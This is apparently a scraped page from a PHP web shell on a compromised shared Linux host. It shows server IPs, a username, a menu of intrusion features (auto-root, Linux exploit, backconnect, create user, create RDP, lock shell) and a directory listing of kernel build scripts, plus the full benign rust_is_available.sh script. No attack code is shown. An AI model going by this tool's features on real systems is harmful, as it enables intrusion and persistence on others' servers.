Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
src /
linux-hwe-6.5-headers-6.5.0-45 /
scripts /
[ HOME SHELL ]
Name
Size
Permission
Action
atomic
[ DIR ]
drwxr-xr-x
basic
[ DIR ]
drwxr-xr-x
clang-tools
[ DIR ]
drwxr-xr-x
coccinelle
[ DIR ]
drwxr-xr-x
dtc
[ DIR ]
drwxr-xr-x
dummy-tools
[ DIR ]
drwxr-xr-x
gcc-plugins
[ DIR ]
drwxr-xr-x
gdb
[ DIR ]
drwxr-xr-x
genksyms
[ DIR ]
drwxr-xr-x
kconfig
[ DIR ]
drwxr-xr-x
ksymoops
[ DIR ]
drwxr-xr-x
mod
[ DIR ]
drwxr-xr-x
package
[ DIR ]
drwxr-xr-x
selinux
[ DIR ]
drwxr-xr-x
tracing
[ DIR ]
drwxr-xr-x
.gitignore
174
B
-rw-r--r--
Kbuild.include
10.1
KB
-rw-r--r--
Kconfig.include
2.57
KB
-rw-r--r--
Lindent
502
B
-rwxr-xr-x
Makefile
1.67
KB
-rw-r--r--
Makefile.asm-generic
1.82
KB
-rw-r--r--
Makefile.build
17.41
KB
-rw-r--r--
Makefile.clang
1.61
KB
-rw-r--r--
Makefile.clean
1.87
KB
-rw-r--r--
Makefile.compiler
2.71
KB
-rw-r--r--
Makefile.debug
1.12
KB
-rw-r--r--
Makefile.defconf
1.16
KB
-rw-r--r--
Makefile.dtbinst
1.02
KB
-rw-r--r--
Makefile.extrawarn
3.49
KB
-rw-r--r--
Makefile.gcc-plugins
2.59
KB
-rw-r--r--
Makefile.headersinst
2.88
KB
-rw-r--r--
Makefile.host
5.81
KB
-rw-r--r--
Makefile.kasan
2.45
KB
-rw-r--r--
Makefile.kcov
333
B
-rw-r--r--
Makefile.kcsan
1004
B
-rw-r--r--
Makefile.kmsan
208
B
-rw-r--r--
Makefile.lib
20.98
KB
-rw-r--r--
Makefile.modfinal
2.76
KB
-rw-r--r--
Makefile.modinst
2.85
KB
-rw-r--r--
Makefile.modpost
4.65
KB
-rw-r--r--
Makefile.package
9.74
KB
-rw-r--r--
Makefile.randstruct
511
B
-rw-r--r--
Makefile.ubsan
779
B
-rw-r--r--
Makefile.userprogs
1.57
KB
-rw-r--r--
Makefile.vmlinux
1.48
KB
-rw-r--r--
Makefile.vmlinux_o
3.27
KB
-rw-r--r--
as-version.sh
2.03
KB
-rwxr-xr-x
asn1_compiler.c
35.32
KB
-rw-r--r--
bloat-o-meter
3.76
KB
-rwxr-xr-x
bootgraph.pl
5.64
KB
-rwxr-xr-x
bpf_doc.py
31.66
KB
-rwxr-xr-x
cc-can-link.sh
166
B
-rwxr-xr-x
cc-version.sh
1.36
KB
-rwxr-xr-x
check-git
298
B
-rwxr-xr-x
check-sysctl-docs
3.66
KB
-rwxr-xr-x
check_extable.sh
4.93
KB
-rwxr-xr-x
checkdeclares.pl
1.1
KB
-rwxr-xr-x
checkincludes.pl
1.94
KB
-rwxr-xr-x
checkkconfigsymbols.py
15.75
KB
-rwxr-xr-x
checkpatch.pl
231.24
KB
-rwxr-xr-x
checkstack.pl
5.71
KB
-rwxr-xr-x
checksyscalls.sh
7.51
KB
-rwxr-xr-x
checkversion.pl
2.16
KB
-rwxr-xr-x
cleanfile
3.46
KB
-rwxr-xr-x
cleanpatch
5.06
KB
-rwxr-xr-x
coccicheck
7.9
KB
-rwxr-xr-x
config
4.67
KB
-rwxr-xr-x
const_structs.checkpatch
1.39
KB
-rw-r--r--
decode_stacktrace.sh
7.51
KB
-rwxr-xr-x
decodecode
4.76
KB
-rwxr-xr-x
depmod.sh
1.41
KB
-rwxr-xr-x
dev-needs.sh
6.07
KB
-rwxr-xr-x
diffconfig
4.12
KB
-rwxr-xr-x
documentation-file-ref-check
5.67
KB
-rwxr-xr-x
export_report.pl
4.5
KB
-rwxr-xr-x
extract-ikconfig
1.74
KB
-rwxr-xr-x
extract-module-sig.pl
3.66
KB
-rwxr-xr-x
extract-sys-certs.pl
3.75
KB
-rwxr-xr-x
extract-vmlinux
1.66
KB
-rwxr-xr-x
extract_xc3028.pl
44.62
KB
-rwxr-xr-x
faddr2line
8.29
KB
-rwxr-xr-x
file-size.sh
86
B
-rwxr-xr-x
find-unused-docs.sh
1.27
KB
-rwxr-xr-x
gcc-x86_32-has-stack-protector...
408
B
-rwxr-xr-x
gcc-x86_64-has-stack-protector...
198
B
-rwxr-xr-x
gen-randstruct-seed.sh
228
B
-rwxr-xr-x
generate_initcall_order.pl
5.95
KB
-rwxr-xr-x
generate_rust_analyzer.py
4.04
KB
-rwxr-xr-x
generate_rust_target.rs
5.25
KB
-rw-r--r--
get_abi.pl
25.32
KB
-rwxr-xr-x
get_dvb_firmware
24.54
KB
-rwxr-xr-x
get_feat.pl
14.61
KB
-rwxr-xr-x
get_maintainer.pl
67.18
KB
-rwxr-xr-x
gfp-translate
1.71
KB
-rwxr-xr-x
head-object-list.txt
1.38
KB
-rw-r--r--
headerdep.pl
3.5
KB
-rwxr-xr-x
headers_install.sh
3.03
KB
-rwxr-xr-x
insert-sys-cert.c
13.08
KB
-rw-r--r--
install.sh
986
B
-rwxr-xr-x
jobserver-exec
2.56
KB
-rwxr-xr-x
kallsyms.c
18.87
KB
-rw-r--r--
kernel-doc
66.93
KB
-rwxr-xr-x
ld-version.sh
1.67
KB
-rwxr-xr-x
leaking_addresses.pl
12.84
KB
-rwxr-xr-x
link-vmlinux.sh
7.64
KB
-rwxr-xr-x
makelst
808
B
-rwxr-xr-x
markup_oops.pl
7.92
KB
-rwxr-xr-x
min-tool-version.sh
577
B
-rwxr-xr-x
misc-check
509
B
-rwxr-xr-x
mkcompile_h
642
B
-rwxr-xr-x
mksysmap
2.58
KB
-rwxr-xr-x
mkuboot.sh
414
B
-rwxr-xr-x
module.lds.S
1.41
KB
-rw-r--r--
modules-check.sh
443
B
-rwxr-xr-x
nsdeps
1.63
KB
-rw-r--r--
objdiff
2.83
KB
-rwxr-xr-x
objdump-func
848
B
-rwxr-xr-x
orc_hash.sh
316
B
-rw-r--r--
pahole-flags.sh
855
B
-rwxr-xr-x
pahole-version.sh
269
B
-rwxr-xr-x
parse-maintainers.pl
4.54
KB
-rwxr-xr-x
patch-kernel
9.95
KB
-rwxr-xr-x
profile2linkerlist.pl
414
B
-rwxr-xr-x
prune-kernel
912
B
-rwxr-xr-x
recordmcount.c
17.56
KB
-rw-r--r--
recordmcount.h
19.37
KB
-rw-r--r--
recordmcount.pl
17.5
KB
-rwxr-xr-x
relocs_check.sh
717
B
-rwxr-xr-x
remove-stale-files
1.28
KB
-rwxr-xr-x
rust_is_available.sh
6.07
KB
-rwxr-xr-x
rust_is_available_bindgen_libc...
91
B
-rw-r--r--
setlocalversion
4.21
KB
-rwxr-xr-x
show_delta
3.01
KB
-rwxr-xr-x
sign-file.c
9.93
KB
-rw-r--r--
sorttable.c
7.68
KB
-rw-r--r--
sorttable.h
12.85
KB
-rw-r--r--
spdxcheck-test.sh
284
B
-rw-r--r--
spdxcheck.py
15.23
KB
-rwxr-xr-x
spdxexclude
417
B
-rw-r--r--
spelling.txt
33.88
KB
-rw-r--r--
sphinx-pre-install
25.41
KB
-rwxr-xr-x
split-man.pl
604
B
-rwxr-xr-x
stackdelta
1.84
KB
-rwxr-xr-x
stackusage
794
B
-rwxr-xr-x
subarch.include
647
B
-rw-r--r--
syscallhdr.sh
1.89
KB
-rwxr-xr-x
syscallnr.sh
1.45
KB
-rwxr-xr-x
syscalltbl.sh
1.45
KB
-rwxr-xr-x
tags.sh
10.75
KB
-rwxr-xr-x
test_fortify.sh
2.23
KB
-rw-r--r--
tools-support-relr.sh
726
B
-rwxr-xr-x
ubuntu-retpoline-extract-one
7.26
KB
-rw-r--r--
unifdef.c
34.8
KB
-rw-r--r--
ver_linux
2.59
KB
-rwxr-xr-x
xen-hypercalls.sh
386
B
-rwxr-xr-x
xz_wrap.sh
563
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : rust_is_available.sh
#!/bin/sh # SPDX-License-Identifier: GPL-2.0 # # Tests whether a suitable Rust toolchain is available. set -e min_tool_version=$(dirname $0)/min-tool-version.sh # Convert the version string x.y.z to a canonical up-to-7-digits form. # # Note that this function uses one more digit (compared to other # instances in other version scripts) to give a bit more space to # `rustc` since it will reach 1.100.0 in late 2026. get_canonical_version() { IFS=. set -- $1 echo $((100000 * $1 + 100 * $2 + $3)) } # Check that the Rust compiler exists. if ! command -v "$RUSTC" >/dev/null; then echo >&2 "***" echo >&2 "*** Rust compiler '$RUSTC' could not be found." echo >&2 "***" exit 1 fi # Check that the Rust bindings generator exists. if ! command -v "$BINDGEN" >/dev/null; then echo >&2 "***" echo >&2 "*** Rust bindings generator '$BINDGEN' could not be found." echo >&2 "***" exit 1 fi # Check that the Rust compiler version is suitable. # # Non-stable and distributions' versions may have a version suffix, e.g. `-dev`. rust_compiler_version=$( \ LC_ALL=C "$RUSTC" --version 2>/dev/null \ | head -n 1 \ | grep -oE '[0-9]+\.[0-9]+\.[0-9]+' \ ) rust_compiler_min_version=$($min_tool_version rustc) rust_compiler_cversion=$(get_canonical_version $rust_compiler_version) rust_compiler_min_cversion=$(get_canonical_version $rust_compiler_min_version) if [ "$rust_compiler_cversion" -lt "$rust_compiler_min_cversion" ]; then echo >&2 "***" echo >&2 "*** Rust compiler '$RUSTC' is too old." echo >&2 "*** Your version: $rust_compiler_version" echo >&2 "*** Minimum version: $rust_compiler_min_version" echo >&2 "***" exit 1 fi if [ "$rust_compiler_cversion" -gt "$rust_compiler_min_cversion" ]; then echo >&2 "***" echo >&2 "*** Rust compiler '$RUSTC' is too new. This may or may not work." echo >&2 "*** Your version: $rust_compiler_version" echo >&2 "*** Expected version: $rust_compiler_min_version" echo >&2 "***" fi # Check that the Rust bindings generator is suitable. # # Non-stable and distributions' versions may have a version suffix, e.g. `-dev`. rust_bindings_generator_version=$( \ LC_ALL=C "$BINDGEN" --version 2>/dev/null \ | head -n 1 \ | grep -oE '[0-9]+\.[0-9]+\.[0-9]+' \ ) rust_bindings_generator_min_version=$($min_tool_version bindgen) rust_bindings_generator_cversion=$(get_canonical_version $rust_bindings_generator_version) rust_bindings_generator_min_cversion=$(get_canonical_version $rust_bindings_generator_min_version) if [ "$rust_bindings_generator_cversion" -lt "$rust_bindings_generator_min_cversion" ]; then echo >&2 "***" echo >&2 "*** Rust bindings generator '$BINDGEN' is too old." echo >&2 "*** Your version: $rust_bindings_generator_version" echo >&2 "*** Minimum version: $rust_bindings_generator_min_version" echo >&2 "***" exit 1 fi if [ "$rust_bindings_generator_cversion" -gt "$rust_bindings_generator_min_cversion" ]; then echo >&2 "***" echo >&2 "*** Rust bindings generator '$BINDGEN' is too new. This may or may not work." echo >&2 "*** Your version: $rust_bindings_generator_version" echo >&2 "*** Expected version: $rust_bindings_generator_min_version" echo >&2 "***" fi # Check that the `libclang` used by the Rust bindings generator is suitable. # # In order to do that, first invoke `bindgen` to get the `libclang` version # found by `bindgen`. This step may already fail if, for instance, `libclang` # is not found, thus inform the user in such a case. bindgen_libclang_output=$( \ LC_ALL=C "$BINDGEN" $(dirname $0)/rust_is_available_bindgen_libclang.h 2>&1 >/dev/null ) || bindgen_libclang_code=$? if [ -n "$bindgen_libclang_code" ]; then echo >&2 "***" echo >&2 "*** Running '$BINDGEN' to check the libclang version (used by the Rust" echo >&2 "*** bindings generator) failed with code $bindgen_libclang_code. This may be caused by" echo >&2 "*** a failure to locate libclang. See output and docs below for details:" echo >&2 "***" echo >&2 "$bindgen_libclang_output" echo >&2 "***" exit 1 fi # `bindgen` returned successfully, thus use the output to check that the version # of the `libclang` found by the Rust bindings generator is suitable. bindgen_libclang_version=$( \ echo "$bindgen_libclang_output" \ | sed -nE 's:.*clang version ([0-9]+\.[0-9]+\.[0-9]+).*:\1:p' ) bindgen_libclang_min_version=$($min_tool_version llvm) bindgen_libclang_cversion=$(get_canonical_version $bindgen_libclang_version) bindgen_libclang_min_cversion=$(get_canonical_version $bindgen_libclang_min_version) if [ "$bindgen_libclang_cversion" -lt "$bindgen_libclang_min_cversion" ]; then echo >&2 "***" echo >&2 "*** libclang (used by the Rust bindings generator '$BINDGEN') is too old." echo >&2 "*** Your version: $bindgen_libclang_version" echo >&2 "*** Minimum version: $bindgen_libclang_min_version" echo >&2 "***" exit 1 fi # If the C compiler is Clang, then we can also check whether its version # matches the `libclang` version used by the Rust bindings generator. # # In the future, we might be able to perform a full version check, see # https://github.com/rust-lang/rust-bindgen/issues/2138. cc_name=$($(dirname $0)/cc-version.sh $CC | cut -f1 -d' ') if [ "$cc_name" = Clang ]; then clang_version=$( \ LC_ALL=C $CC --version 2>/dev/null \ | sed -nE '1s:.*version ([0-9]+\.[0-9]+\.[0-9]+).*:\1:p' ) if [ "$clang_version" != "$bindgen_libclang_version" ]; then echo >&2 "***" echo >&2 "*** libclang (used by the Rust bindings generator '$BINDGEN')" echo >&2 "*** version does not match Clang's. This may be a problem." echo >&2 "*** libclang version: $bindgen_libclang_version" echo >&2 "*** Clang version: $clang_version" echo >&2 "***" fi fi # Check that the source code for the `core` standard library exists. # # `$KRUSTFLAGS` is passed in case the user added `--sysroot`. rustc_sysroot=$("$RUSTC" $KRUSTFLAGS --print sysroot) rustc_src=${RUST_LIB_SRC:-"$rustc_sysroot/lib/rustlib/src/rust/library"} rustc_src_core="$rustc_src/core/src/lib.rs" if [ ! -e "$rustc_src_core" ]; then echo >&2 "***" echo >&2 "*** Source code for the 'core' standard library could not be found" echo >&2 "*** at '$rustc_src_core'." echo >&2 "***" exit 1 fi
Close